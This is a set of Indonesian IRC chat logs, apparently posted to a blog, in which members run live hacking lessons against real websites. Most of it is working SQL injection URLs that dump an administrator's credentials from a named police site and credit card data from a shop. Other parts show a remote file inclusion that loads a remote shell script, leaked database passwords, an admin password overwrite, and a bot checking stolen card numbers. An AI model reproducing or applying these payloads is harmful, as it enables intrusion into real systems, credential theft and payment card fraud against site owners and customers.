<+[DEVIL_MAY_CRY]> iya
<+[DEVIL_MAY_CRY]> ayo di concat..xixixi
<&home_edition2001> information_schema.columns << ni fasilitas versi 5 mysql yang kita hajar
<+dbzgts> mantabbbbb
<&home_edition2001> xixi
<&home_edition2001> di versi 4 gak ada
<&home_edition2001> itu isinya kek daftar isi tabel dan colom suatu database
<&home_edition2001> xixix
<+coayaoo> klo versi 4 gimana om bius
<&home_edition2001> wew
<+[DEVIL_MAY_CRY]> ok seep
<&home_edition2001> tebek2an
<&home_edition2001> xixix
<+[DEVIL_MAY_CRY]> perintahnya cemana tu?
<&home_edition2001> <&home_edition2001> klo 4 nebak2 yang tadi gw bilang menghadapi pedagang budek dan gagu
<&home_edition2001> <&home_edition2001> cuman isa manggut2 sama geleng2
<+[DEVIL_MAY_CRY]> ya langsung inikan versi 5
<&home_edition2001> ok kita cari kolom ya
<+[DEVIL_MAY_CRY]> heheheh
<+dbzgts> lanjuttttttt
<+[DEVIL_MAY_CRY]> wew lag
<+[DEVIL_MAY_CRY]> duh lagi semangat
<@live> MILDnet Info : VHOST Need Vhost for your nick?? join #help for further detail
<+dbzgts> besok kita sumbang koneksi satelit ke bius
<+dbzgts> biar lancar tutor ke kita
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,table_name,2,3,4,5,6,7,8,9 from information_schema.tables where table_schema=database()--
<&home_edition2001> ngerti gak
<&aanK> 5.0.24a-Debian_9-log
<&aanK> --root@localhost
<&home_edition2001> perintah2 itu
<&aanK> aku ndak ngerti bius
<&aanK> dikaw terangin dikit la
<+[DEVIL_MAY_CRY]> 3
<+[DEVIL_MAY_CRY]> --admin
<+[DEVIL_MAY_CRY]> 5
<+[DEVIL_MAY_CRY]> itu tabel admin ya?
<&home_edition2001> 3
<&home_edition2001> --admin
<&home_edition2001> 5
<&home_edition2001> wekek
<&home_edition2001> tabel admin
<&home_edition2001> weekek
<&home_edition2001> mantabb
<&home_edition2001> ada tabel admin
<&home_edition2001> mau liat tabel selanjutnya
<+[DEVIL_MAY_CRY]> seep
<&home_edition2001> pake liimit
<&aanK> INVALID QUERY !
<+[DEVIL_MAY_CRY]> gimana tu limit?
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,table_name,2,3,4,5,6,7,8,9 from information_schema.tables where table_schema=database() limit 0,0--
<+dbzgts> wekss error jadinya
<+[DEVIL_MAY_CRY]> hehehe iya error bius
<&home_edition2001> wew
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,table_name,2,3,4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1--
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,table_name,2,3,4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1--< tabel 1
* +suami`cari`slingkuhan (seller@Mild-5BC9724D.evanzo-server.de) Quit (Ping timeout)
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,table_name,2,3,4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1--< tabel 2
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,table_name,2,3,4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1-- << 2
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,table_name,2,3,4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=database()%20limit%203,1-- << 3
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,table_name,2,3,4,5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=database()%20limit%4,1-- << 4
<&home_edition2001> xixi
<&home_edition2001> dst
<&home_edition2001> ngerti ga
<&aanK> wew
<&home_edition2001> liat aja perubahannya
<+[DEVIL_MAY_CRY]> ngerti
<&aanK> terus cara ngambilnya cemana
<&home_edition2001> --aktifitas_pejalan
* +Portrait (Cheny@1C703F46.43068B63.8DFA7C87.IP) Quit (Ping timeout)
<&home_edition2001> ngambil apa
<+[DEVIL_MAY_CRY]> seep..
<+[DEVIL_MAY_CRY]> maksudnya ngeluarin isi tabel
<&home_edition2001> wew
<&home_edition2001> cari tabel yang bagus dolo la
<&home_edition2001> xixix
<&aanK> ohh
<+[DEVIL_MAY_CRY]> admin bagus tuh
<+[DEVIL_MAY_CRY]> kekeke
<&aanK> iku seperti barang sitaan
<&aanK> yach admin juga bisa bagus kek nya
<&aanK> cara ambil pass adminnya bius
<&home_edition2001> --barang_sitaan
<&home_edition2001> wakaka
<&home_edition2001> tabel yang aneh
<+[DEVIL_MAY_CRY]> kluarin admin aja bius
<&home_edition2001> oke kita bongkar ya
<&home_edition2001> tabel admin
<&home_edition2001> kita perkosa
<+[DEVIL_MAY_CRY]> asikk..asikk
<&home_edition2001> tabel2nya
<&aanK> wewe
<&home_edition2001> kolom2nya
<&aanK> asik asik
<+[DEVIL_MAY_CRY]> wew buka celana dolo ah
<&home_edition2001> maksudnya
<&home_edition2001> admin << target
<&home_edition2001> cara nyusuunnya sama kok
<+[DEVIL_MAY_CRY]> ok
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,column_name,2,3,4,5,6,7,8,9%20from%20information_schema.columns%20where%20table_name=admin%20limit%201,1/*
<+dbzgts> invalid query
<&home_edition2001> wekek
<&home_edition2001> berarti
<+[DEVIL_MAY_CRY]> INVALID QUERY !
<&home_edition2001> kita rubahkata admin kedalam format hexa
<&aanK> kok invalid bius
<+[DEVIL_MAY_CRY]> wew pake apa rubahnya?
<&home_edition2001> !google hex converter
<@live> http://www.easycalculation.com/hex-converter.php
<&aanK> wekekekkke
<+dbzgts> char(97)%2bchar(100)%2bchar(109)%2bchar(105)%2bchar(110)
<&aanK> mantaBB
<+[DEVIL_MAY_CRY]> Decimal to hexa or binary << yg ini bukan?
<&home_edition2001> !google sesimal to hexa
<@live> MILDnet Info : INFO MILDnet Network Staff doesnt responsible for anything you done in this networks as long as not disturb staff, networks and other user, so please behave your self :)
<&home_edition2001> !google desimal to hexa
<@live> http://bestfuture.wordpress.com/2007/11/15/ip-addressing/
<&home_edition2001> !google ascii to hexa
<@live> http://www.easycalculation.com/ascii-hex.php
<+_chilu_> !dns cal.kofu33.org
<+dbzgts> mantabbb
<+dbzgts> langsung muncul
<+[DEVIL_MAY_CRY]> 61 64 6D 69 6E
<+dbzgts> wkokokoko
<+[DEVIL_MAY_CRY]> itu bukan>
<+dbzgts> --DEFAULT_COLLATE_NAME
<+dbzgts> 5
<&home_edition2001> bukan
<&home_edition2001> 75736572
<&aanK> jd
<&home_edition2001> ini bilangan apa ya
<&home_edition2001> lupa
<&aanK> !google decimal to hexa
<@live> http://www.easycalculation.com/hexa-decimal-binary.php
* +Juninho (sexy@Mild-9CD5B60B.amplitudenet.com.br) Quit (Ping timeout)
<&home_edition2001> !google ascii converter
<@live> http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html
<+dbzgts> char(97)%2bchar(100)%2bchar(109)%2bchar(105)%2bchar(110) <-----jadi muncul --DEFAULT_COLLATE_NAME
<&home_edition2001> wew
<&home_edition2001> apa itu
<+dbzgts> asci converter
<+[DEVIL_MAY_CRY]> 97, 100, 109, 105, 110
<+[DEVIL_MAY_CRY]> 61, 64, 6D, 69, 6E
<+[DEVIL_MAY_CRY]> 01100001, 01100100, 01101101, 01101001, 01101110
<+dbzgts> nah yang atas devil
<+[DEVIL_MAY_CRY]> yg mana tuh?
<+dbzgts> yg 97 100
<&home_edition2001> wew
<&home_edition2001> buka
<&home_edition2001> bukan
<&home_edition2001> duh lupa gw
<+dbzgts> mank punya lu muncul apa bius
<&aanK> wedewww
<&home_edition2001> 75736572 << kek gini
<+dbzgts> weksss
<&home_edition2001> artinya user
<+[DEVIL_MAY_CRY]> 75, 73, 65, 72
<+dbzgts> --DEFAULT_COLLATE_NAME
<+dbzgts> 5
<+[DEVIL_MAY_CRY]> itu user
<+[DEVIL_MAY_CRY]> wakakak
<+dbzgts> aku muncul itu....apaan itu?
<+dbzgts> wakakaka
* +log (log@www.rhe.name) has left #nyubicrew (mbingungi)
<&aanK>
<+[DEVIL_MAY_CRY]> http://www.vortex.prodigynet.co.uk/misc/ascii_conv.html << pake ini
<+[DEVIL_MAY_CRY]> liat kolom ke 2
<+dbzgts> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,column_name,2,3,4,5,6,7,8,9%20from%20information_schema.columns%20where%20table_name=char(97)%2bchar(100)%2bchar(109)%2bchar(105)%2bchar(110)%20limit%201,1/*
<+[DEVIL_MAY_CRY]> yg itu bukan bius?
<&home_edition2001> bukan
<+[DEVIL_MAY_CRY]> 3
<+[DEVIL_MAY_CRY]> --DEFAULT_COLLATE_NAME
<+[DEVIL_MAY_CRY]> 5
<&home_edition2001> bukan
<&home_edition2001> bukan
<&home_edition2001> bukan
<+[DEVIL_MAY_CRY]> xixixi salah
<+dbzgts> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,column_name,2,3,4,5,6,7,8,9%20from%20information_schema.columns%20where%20table_name=char(97)%2bchar(100)%2bchar(109)%2bchar(105)%2bchar(110)%20limit%202,1/*
<+dbzgts> jadi ada -- description
<+[DEVIL_MAY_CRY]> cemana donk pa guru
<+[DEVIL_MAY_CRY]> puyeng ne
* +coayaoo (kandas@Mild-89466F89.ipt.aol.com) Quit (Ping timeout)
<&aanK> 3
<&aanK> --DESCRIPTION
<&aanK> jgn nanya melulu
<&aanK> testtest
<&home_edition2001> wew
<&home_edition2001> sabar
<+[DEVIL_MAY_CRY]> 3
<+[DEVIL_MAY_CRY]> --DESCRIPTION
<+[DEVIL_MAY_CRY]> 5
<+[DEVIL_MAY_CRY]> xixixi
<+[DEVIL_MAY_CRY]> pak guru lagi otak atik
* +amigaox (azitromed@E51262AE.EE987600.98BFBD86.IP) Quit (Quit from MILDNet: )
<&home_edition2001> http://www.piclist.com/techref/ascii.htm
<&home_edition2001> buka
<+[DEVIL_MAY_CRY]> ok
* +ENGINEBOY (ENGINEBOY@Mild-C7DECCA9.rmts.satcom-systems.net) Quit (Ping timeout)
<@live> MILDnet Info : FORUM Visit our official FORUM at http://mildnet.net
* +TetRa (TetRa@tHe.pReSiDeNt.oF.tHe.uNiTeD.sTaTes.g0v) Quit (Ping timeout)
<+[DEVIL_MAY_CRY]> wew lama amat kebukanya
<&home_edition2001> HEX string
<+dbzgts> nah tuh
<&home_edition2001> admin=61646D696E
<&home_edition2001> xoxox
<&home_edition2001> ok
<&home_edition2001> balik ke tanktop
<+anakbugis> kekekek
<+[DEVIL_MAY_CRY]> ok
<+anakbugis> kembali ke tutunk
<+anakbugis> kekekek
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,column_name,2,3,4,5,6,7,8,9%20from%20information_schema.columns%20where%20table_name=0x61646D696E%20limit%201,1/*
<&home_edition2001> keluarkan
<&home_edition2001> --password
<&home_edition2001> wekeke
<&home_edition2001> cari lain lagi yu
<+[DEVIL_MAY_CRY]> 3
<+[DEVIL_MAY_CRY]> --password
<+[DEVIL_MAY_CRY]> 5
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,column_name,2,3,4,5,6,7,8,9%20from%20information_schema.columns%20where%20table_name=0x61646D696E%20limit%200,1/* << kolom 1
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,column_name,2,3,4,5,6,7,8,9%20from%20information_schema.columns%20where%20table_name=0x61646D696E%20limit%201,1/* < kolom 2
<+anakbugis> kekekeek
<+[DEVIL_MAY_CRY]> mantabb bius
<&home_edition2001> wekeke mudah kan
<&home_edition2001> maknyus
<&home_edition2001> xixi
<+[DEVIL_MAY_CRY]> 3
<+[DEVIL_MAY_CRY]> --user
<+[DEVIL_MAY_CRY]> 5
<&home_edition2001> paste tabel colom dari tabel
<&home_edition2001> paste tabel colom dari tabel
<&home_edition2001> paste tabel colom dari tabel dmin
<&home_edition2001> paste
<&home_edition2001> semuanya
<&home_edition2001> kita keluarkan
<&home_edition2001> xixix
<+anakbugis> kekekek
<+anakbugis> siaaaaaaaap
<+anakbugis> wkwkwk
<&home_edition2001> wew
<&home_edition2001> lama kali
<&home_edition2001> xixix
<&home_edition2001> masa gw juga turun tangan
<&home_edition2001> cape de
<+dbzgts> mesti bagi tugas
<+dbzgts> satu org satu
<+dbzgts> ;o
<&aanK> ZZzzzzzz
<+anakbugis> wkwkwkw
<+[DEVIL_MAY_CRY]> mesti di hex lagi ya semuanya
<&home_edition2001> xxi
<&home_edition2001> kan tadi keliatan colom2nya
<&home_edition2001> xixi
<&home_edition2001> paste la disini
<&home_edition2001> yang ada user
<&home_edition2001> password
<&home_edition2001> apa lagi
<&home_edition2001> biar bagus hasilnya
<+[DEVIL_MAY_CRY]> 3
<+[DEVIL_MAY_CRY]> --id
<+[DEVIL_MAY_CRY]> 5
<&home_edition2001> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-1%20union%20select%200,1,2,concat(username,0x3a,password),4,5,6,7,8,9%20from%20user/*
<&home_edition2001> xix
<&home_edition2001> tu silakan pake
<&home_edition2001> xixi
<&home_edition2001> awawaw
<&home_edition2001> administrator:5f4dcc3b5aa765d61d8327deb882cf99
<&home_edition2001> --1
<&home_edition2001> 5
<&home_edition2001> 5f4dcc3b5aa765d61d8327deb882cf99 password
* live sets mode: -i
<&home_edition2001> loginnya di
<&home_edition2001> http://www.lantas.metro.polri.go.id/intranet
<&home_edition2001> http://www.lantas.metro.polri.go.id/intranet/ user administrator pasnya password
<&home_edition2001> xixi
<+[DEVIL_MAY_CRY]> 0x3a << variabel ini udah fix ya?
* log (log@www.rhe.name) has joined #nyubicrew
<+anakbugis> wkwkwkwkw
<@live> MILDnet Info : INFO MILDnet Network Staff doesnt responsible for anything you done in this networks as long as not disturb staff, networks and other user, so please behave your self :)
<&home_edition2001> 0x3a :
<+Estrada> Your webmin100 account has been provisioned and is ready for you to use. Thank you for your patience over the course of the account setup process.
<+Estrada> This email contains your server login information and links to useful Webmin resources.
<+Estrada> *** Your Account Information ***
<&home_edition2001> 0x3a \sama dengan :
* +nicolas (nicolas@61C41B4C.2E12D6F6.7F86A531.IP) Quit (Ping timeout)
* SancheZ (rickdes@SancheZ.RunDown.Team.RDT) has joined #nyubicrew
<+anakbugis> wkwwkkw
<+anakbugis> adminx banyak amir
<+anakbugis> wkwwkwkwk
<+[DEVIL_MAY_CRY]> 4,5,6,7,8,9 << trus nenetuin ini cuma sampe 9 cemana bius?
* Saritem is now known as saritem
<+anakbugis> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,concat(user,0x3a,password),2,3,4,5,6,7,8,9%20from%20admin%20limit%201,1/*
<+anakbugis> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,concat(user,0x3a,password),2,3,4,5,6,7,8,9%20from%20admin%20limit%200,1/*
* live sets mode: +v log
<+smart07> 2004/256 SELATAN 1 SUPRIYADI JOGLO RT 8/2 KEMBANGAN JAK-BAR 22 Laki-Laki Pelajar WNI
<+smart07> wah pelaku bius neh
<+smart07> xixixix
<+anakbugis> http://www.lantas.metro.polri.go.id/news/index.php?id=2&nid=-12228%20union%20select%200,concat(user,0x3a,password),2,3,4,5,6,7,8,9%20from%20admin%20limit%204,1/*
* dimas_adon (otak.babi@Mild-EFF5383C.ipt.aol.com) has joined #nyubicrew
* live sets mode: +v SancheZ
<+anakbugis> login : polantas
<+anakbugis> pass : internet
<+anakbugis> kekekek
* ella (kandas@ella.users.mildnet.org) has joined #nyubicrew
!cvv2 4264287633287418
<+Superman> dimas_adon , <> is Visa > cvv2 : « 687 »
<+dbzgts> polisi baru belajar main internet rupanya
<+demittegal> ekeke
* +SancheZ (rickdes@SancheZ.RunDown.Team.RDT) Quit (Ping timeout)
<+[DEVIL_MAY_CRY]> wew..seeep..makasih bius atas pelajaran nya
<+[DEVIL_MAY_CRY]> mo balik dolo wes malam
* live sets mode: +v sayangmana
<+dbzgts> mantabbb bius
* kaos (kaos@kaos.users.mildnet.org) has joined #nyubicrew
!cvv2 5581080000623569
<+Superman> dimas_adon , <> is MasterCard > cvv2 : « 029 »
<+dbzgts> besok2 klo byk yg bisa jadi byk yg paste cc ke ch nah
<+dbzgts> ;o
* live sets mode: +v dimas_adon
<+anakbugis> wkwkwkwwk
* +[DEVIL_MAY_CRY] (devil@Mild-206375E4.publicvpn.net) Quit (Quit from MILDNet: )
<+anakbugis> !cclimit 4426248709839800
<+dbzgts> weww...lgsung cabut
<+Superman> [anakbugis] I found limit for your Visa (4426248709839800) : 0.243 $ (This Doesn't Mean Its Valid) >!< [[SlaveZerّ5]] for #nyubicrew
* nicolas (nicolas@787194CC.710FA170.7F86A531.IP) has joined #nyubicrew
<+dbzgts> ntar lagi on
<+dbzgts> mo keluar print dulu

http://demonpowerproducts.co.uk/customer_testimonials.php?testimonial_id=-1%20union%20select%200,1,concat(billing_name,0x3C3D3E,billing_street_address,0x3C3D3,billing_city,0x3C3D3,billing_state,0x3C3D3E,billing_postcode,0x3C3D3E,billing_country,0x3C3D3E,payment_method,0x3C3D3E,cc_owner,0x3C3D3E,cc_number,0x3C3D3E,cc_expires,0x3C3D3E,date_purchased),3,4,5,6,7%20from%20orders%20limit%204000,1000/*

UPDATE ADMIN

2008-03-21T08:28:00.001-07:00

show tables;
show tables;select * from jos_users;
show tables;select * from jos_users;select md5('hehe');
update jos_users set password='529ca8050a00180790cf88b63468826a'where username='admin';
show tables;select * from jos_users;select md5('hehe');

ADMIN SQL

2008-03-21T08:26:00.000-07:00

http://genealogie.vanderlichte.nl//help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://www.kapanakuke.com/dyingdevil.txt?
ok wekz
kita belajar bareng yah
ini aja
gak ada apa apa nya itu
http://www.goldletterdv.com/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=
* _aw`aw`aw has joined #mimid
begh
<_aw`aw`aw> asyuk
<_aw`aw`aw> dc
<_aw`aw`aw> :(
* _aw`aw`aw is now known as ngArAng
jikakakak
yuk langsung
kwakawkwakwakkwawa
<|||Zz_Kujanglapuk> terus di apain KK
http://genealogie.vanderlichte.nl//help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://www.kapanakuke.com/dyingdevil.txt? <-= target kita
kan buat contoh aja rang
kita latihan nyare tempat adminya
;D
iyah
ok
* Scr3W_W0rM has joined #mimid
ntar kalo web down jangan nyalain orang
ok ok
kwakwakwakwakwakkwakwakwawa
* ngArAng has left #mimid
* ngArAng has joined #mimid
* ChanServ sets mode: +o ngArAng
yang mana ini yang mau di kerjain
* ngArAng has left #mimid
* ngArAng has joined #mimid oms...bagi c99 nya dunk
:D
oiiiiiiiiiii...ONTA Mesir...!!
asyuk
psy kemak
dc mulu
buset dah di diemin gua
* t0bAt^t0bAt is now known as ngArAng
jikakaka
http://www.geocities.com/diedoctordie/99.txt
* ngArAng sets mode: +v Scr3W_W0rM
sabar didil
psy kemak dc mulu
pake server asli plis :P
http://genealogie.vanderlichte.nl//help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=http://www.kapanakuke.com/dyingdevil.txt? <-= kita pake ini
yuk
pertama
hu uh
klo kita mao nyare login admin kita harus dapet login myqsl dolo
trus
nah biasanya login mysql ituh ada di config.php ****.config.php dan sejenisnya
kill` : jangan kmana2 kau .. nantik2 aja modus mu itu :P
wew
nyampek sini ada yang tanya?
sudah
$PGV_BASE_DIRECTORY = ""; //-- path to phpGedView (Only needed when running as phpGedView from another php program such as postNuke, otherwise leave it blank)
$DBTYPE = "mysql"; //-- type of database to connect when using the PEAR:DB module
$DBHOST = "localhost"; //-- Host where MySQL database is kept
$DBUSER = "limmyjw_pgv"; //-- MySQL database User Name
lanjod
$DBPASS = "pinguin0"; //-- MySQL database User Password
$DBNAME = "limmyjw_pgv";
lanjoooottt....cukup jelas
ok
sudh ketemu
kita belajar bareng
sabar
tunggu temen kita
* ngArAng slaps demittegal around a bit with a large trout
lanjot
dah paham blon
lanjoooottt....cukup jelas
satu² cuk
matane
<|||Zz_Kujanglapuk> waduh kok me ngaknemu yaa
tunggu temen kita
gini
bentar
biasanya tempat config.php tempatnya abis web nya
contoh di web tadi ada home/limmyjw/domains/vanderlichte.nl/public_html/genealogie
direktory nya di liat bang
ini dir nya
siap bos!!
/home/limmyjw/domains/vanderlichte.nl/public_html/genealogie
klo dah bisa make perintah : find -name config.php (bisa config ganti yang lain) <-= untuk linux
sep
dah jelas bang kujang?
bentar
sabar dolo
<|||Zz_Kujanglapuk> udah
kita belajar bareng
ok
login mysql nya ada di config.php
ok...pak dosen...sangat2 jelas!!
:D
xixixixixx
home/limmyjw/domains/vanderlichte.nl/public_html/genealogie/config.php <-= kita buka
;D
hehehehe
* THeWeek makan dulu !
ok wek
silahkan
makan dulu smua
* THeWeek sambil nyimak
sep
config.php nya sudah ane ferkosa nih!!
:)
wew
lanjut !!
wew
lanjut !!
ntar rang $DBHOST = "localhost"; //-- Host where MySQL database is kept
$DBUSER = "limmyjw_pgv"; //-- MySQL database User Name
$DBPASS = "pinguin0"; //-- MySQL database User Password
$DBNAME = "limmyjw_pgv"; //-- The MySQL database name where you
nah
si kill blon ngerti itu
* Scr3W_W0rM syg sdh tak ferawan lg
ituh yang kita care dah nemu
sudah
aku duluan yang paste
kalo blon ngerti ngomong
ok kalo dah ngerti
iyes
kalo blon ngerti ngomong ajeh
nah
langkah kedua dah finish
db user sama db name sama kaga rang
kita lanjutkan ke langkah selanjutnya
* aehuaihe is now known as BLuE_MiO|
* BLuE_MiO| is now known as aehuaihe
langkah selanjutnya kita masukin smua data ituh untuk masuk ke dalam sql nya
user : limmyjw_pgv
pass : pinguin0
oms ngarang boleh nanya ttg satu hal..?
databese : limmyjw_pgv
localhost : tetep
Scr3W_W0rM : silahkan
port tetep
port : tetep
oik kl mo lihat domainlainnya/aliases nya gmn dr target tsb??
masok nya ke mana
ke Dump da tabase table or Run SQL query
kill` : di bawah kill
bentar
jangan doloin cuk
iyah
sabar dulu
sory
eh yah ding
salah
maap
duluin..??
kita kebahain di dalam monitor
Run SQL query <-= tempatnya
agak kebawah
ada beberapa kotak
dah pada nemu?
ada lima kotak
duluin..?? <-= ngomong ama si kill bang
maap
bener
bawahnya ada tulisan : SHOW DATABASES; SELECT * FROM user; SELECT
version(); select
user();
ada yang blon nemu kah?
|||Zz_Kujanglapuk : dah nemu bang?
[ngArAng:#mimid PING]
dah nemu rang
* aw`aw`aw has quit IRC (Read error: Connection timed out)
<|||Zz_Kujanglapuk> lanjutkan aja
o0o
ok
bah time out dia
sep
* ngArAng slaps Scr3W_W0rM around a bit with a large trout
yup
* ngArAng slaps kill` around a bit with a large trout
kalian dah nemu?
sudah
ok
SHOW DATABASES; SELECT * FROM user; SELECT
version(); select
user();
sep
ituh delete smua
Query#0 : select * from test
Error : Table 'limmyjw_pgv.test' doesn't exist
ganti : show tables;
wedwe
sabar
xixixixixixiix
sorry2
nah kan
duuin orang
kepencet/salah
kwakwakwakwakwakawwa
hwauwauwahuhwa
ya dah
SHOW DATABASES; SELECT * FROM user; SELECT
version(); select
user();
trs2 lanjut bos
ituh ganti dolo sebelum di klik
ganti : show tables;
sudah di del
jangan lupa tanda (;)
ganti : show tables;
tanda titik koma ituh penting
kalo g di kasih ntar error lage
udah
sep
Scr3W_W0rM : gmn?
udah?
sip2
sabar kill
lanjuuuuuuuuuuutttttttt
kita tunggu temen
ok
apa yang keluar
paste sedikit ajeh
2 kolom paling atas
Query#0 : select * from pgv_users
u_username u_password u_firstname u_lastname u_gedcomid u_rootid u_canadmin u_canedit u_email u_verified u_verified_by_admin u_language u_pwrequested u_reg_timestamp u_reg_hashcode u_theme u_loggedin u_sessiontime u_contactmethod u_visibleonline u_editaccount u_defaulttab u_comment u_comment_exp u_sync_gedcom u_relationship_privacy u_max_relation_path u_auto_accept
limmyjw $1$ubc0TwfC$GBUouRX9v7i8JePVZyNH9/
* Scr3W_W0rM opsss...
begh
kok done
wew
jauh amit
salah paste lg bos...mestinyatabelnyadulu..!! coly2
kok done : maksutnya
?
sante umz
gak masok
kita belajar bareng ajeh
;d
wew
sip2
ada yang salah
terliti again
user pass ma database liat lage
<|||Zz_Kujanglapuk> Query#0 : SHOW tables
<|||Zz_Kujanglapuk> Tables_in_limmyjw_pgv
<|||Zz_Kujanglapuk> pgv_blocks
sep
<|||Zz_Kujanglapuk> ituya KK
mantep bang kujang
hu u
sabr bang kujang
kita tunggu kill
* ngArAng slaps kill` around a bit with a large trout
dah lum
wew
sabar
ok
show tables;
ituh jangan salah nulisnya
harus ada tanda (titik koma)
iyah
masih error?
nulis nya show tables;
apa show tables ();
show tables;
artinya liat smua table kok gak masok
kalo dalam indo
user : limmyjw_pgv
pass : pinguin0
oms ngarang boleh nanya ttg satu hal..?
databese : limmyjw_pgv
localhost : tetep
Scr3W_W0rM : silahkan
port tetep
port : tetep
liat ituh lage
salah paling masangnya
check ulang
[-] ERROR! Can't create dump
wew
salah masang kale kill
check ulang
user pass database
g boelh ada salah ketik
<|||Zz_Kujanglapuk> nulis nya show tables; <= nulisnya jangan cuma ini
jadi kek mana
<|||Zz_Kujanglapuk> SHOW tables; SELECT * FROM user; SELECT
wew
ituh ntar
bagian laen bang
show tables;
ituh doang
wuih
gak masuk bener
wedew
* ngArAng masuk ikz
bang kujang masuk
Query#0 : SHOW DATABASES
Database
limmyjw_pgv
test
Query#1 : SELECT * FROM user
aneh banget kill
Error : Table 'limmyjw_pgv.user' doesn't exist
Query#2 : SELECT version()
version()
4.1.10a-standard-log
Query#3 : select user()
user()
limmyjw_pgv@localhost
itu apaan
kill: salah itu
wew
masuk mana ituh
<|||Zz_Kujanglapuk> dah masuk si kill itu
nyampek mana kau kill
bentar bang
biar g bingung dye
aku pun bingung
Query#0 : show tables
Tables_in_limmyjw_pgv
kok bisa langsung ke situ
ituh bukan
back ajeh
show tables; <-- masuk kan ini
yang keluar
Query#0 : show tables
Tables_in_limmyjw_pgv
pgv_blocks
pgv_dates
pgv_families
pgv_favorites
iyah
pgv_individuals
bener
pgv_media
pgv_media_mapping
sep
emang ituh
koflok
kwakwakkwakwakwkwa
udah
hihihi
lanjot
berarti sekarang kita dah masuk dalam database or sql target
dare situh kita dah bisa liat smua yang ada dalam web tersebut
langsung ajeh kita liat di mana adminya
biasanya tempat admin ada : di user , custumers , admin ato sejenisnya
paham?
yup
<|||Zz_Kujanglapuk> paham? <== paham kk
* kill` paham
kalo di target kita ini kemungkingan besar ada di table : pgv_users
cuba kita buka yuk
biar kita tao
;d
kita lanjut ke cara bukanya
ke bawahin layar monitor kita
masih ada tulisan : show tables; <-= ini kan?
<|||Zz_Kujanglapuk> betul kali kk
sep
kill
gmn
masih ada
show tables;
Scr3W_W0rM <-= gmn
ntar
sabar
kita paham smua harus
;D
Scr3W_W0rM : dah blon
* ngArAng slaps Scr3W_W0rM around a bit with a large trout
malah diem neh orang
wedew
gmn neh
malah diem dye
:(
<|||Zz_Kujanglapuk> Query#0 : select * from pgv_users <== dah jauh dia KK
o0o
xixixixiix
ok
kayaknya dye dah paham emang
ngeles ajeh dye
kwakawkwakkwa
ya dah
kita lanjut
kita buka table pgv_users
kan disitu dah ada : show tables;
apa perintah na
kita tinggal nambahin belakangnya
iyah
jadi
show tables;select * from pgv_users;
paham
jangan ada huruf selain ituh
;D
paham
show tables;select * from pgv_users; <-= mao di bahas nda'?
or dah paham?
kegunaan mereka
* Scr3W_W0rM msh cupu oms kujang...asli...mo belajar nih ama kkk ngarang
* kill` lom paham
Scr3W_W0rM : dah paham nyampek sini?
ok
<|||Zz_Kujanglapuk> SELECT
<|||Zz_Kujanglapuk> version(); select
<|||Zz_Kujanglapuk> user();
<|||Zz_Kujanglapuk> itu di hapus ya
select * from pgv_users; <-==kl gini emang gmn bozz..??? bedanya..??
tlg jelasin donk
show tables; <-= kalo ini masih ada berarti ntar smua table masih keliatan
* Scr3W_W0rM mo tau
bentar
satu²
show tables; <-= kalo ini masih ada berarti ntar smua table masih keliatan
select * from pgv_users; <-= ini command untuk membuka table
select * from pgv_users; <-= pgv_users bisa di ganti smua tables
paham?
ooo...gitu tah...atow..selcet * from admin (misalnya) gitu ys oms?
harus ada tanda titik koma belakangnya
;
ituh penting
g boleh g di kasih
yap2 bos
sep
siap bo

LIVE-TUTOR-SQL

2008-03-21T08:25:00.000-07:00

<&home_edition2001> wew
<&home_edition2001> cemana ini
<&home_edition2001> xix
<&home_edition2001> gimana mau lanjut
<+Bukan-Diriku> wewewewewewewew
<&home_edition2001> gak ada yang nanya
<+Bukan-Diriku> totong lakh
<&home_edition2001> gak ada yang apa
<&home_edition2001> wakak
* +anti_underground (FUCK@saya.adalah.masih.pemula.klaumaubelajar.sama.bius.ajadeh) Quit (Quit: )
<&home_edition2001> http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27 and 1=0 << standart sql injek di php
<&home_edition2001> jika artikel ilang or webnya erorr
<&home_edition2001> xix
<&home_edition2001> dijamin bisa di injek
<&home_edition2001> wakkaka
<&home_edition2001> cape de
<&home_edition2001> sepi kali
<+Bukan-Diriku> hmm
<+Bukan-Diriku> lanjottttt
